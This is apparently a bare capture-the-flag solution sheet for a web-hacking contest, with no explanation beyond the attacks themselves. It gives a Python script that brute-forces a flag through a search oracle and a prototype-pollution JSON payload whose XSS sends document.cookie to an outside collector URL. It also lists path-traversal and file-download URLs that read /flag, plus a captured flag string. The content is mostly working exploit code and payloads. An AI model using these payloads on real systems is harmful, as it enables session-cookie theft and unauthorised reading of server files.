WEB

WEB HACKING 1

#!/usr/bin/env python
# -*- coding: utf8 -*-

import requests

headers = {'Cookie': 'DNT : 1;'}
url = "<http://apse2021.cstec.kr:8022/search>"
string = "1234567890abcdefghijklmnopqrstuvwxyz}"

pw= ""

for i in range (1,100) :
    for j in string :
        query = "?keyword=apollob{" + pw + j
        r = requests.get(url + query, headers=headers)
        if r.text.find('hey hacker, this is your mission') != -1:
            pw = pw + j
            break

    print ("apollob{" + pw)

WEB HACKING 2

{
    "data":
    {
        "score": 100,
        "accelateIntervalTime": 10000,
        "dropIntervalTime": 1000,
        "__proto__":
        {
            "__proto__":
            {
                "preventDefault": "x",
                "handleObj": "x",
                "delegateTarget": "<img/src/onerror='fetch(`https://enowt0zdqkbivy3.m.pipedream.net/?q=`+document.cookie)'>"
            }
        }
    }
}

#apollob{1f9914cd32d31b364cbd6435c41c677da1b050f3a552d506ec5bf300699168a1a82bde82c6d65ce1fd7ad0829e706dff8b6312b7c8fd49708d00e45e0972c72a0f46}

WEB HACKING 3

<http://apse2020.cstec.kr:5005/?url=http%20://localhost/../../../../../../flag>

WEB HACKING 4

<http://apse2021.cstec.kr:8033/download.php?file=/flag>

WEB HACKING 5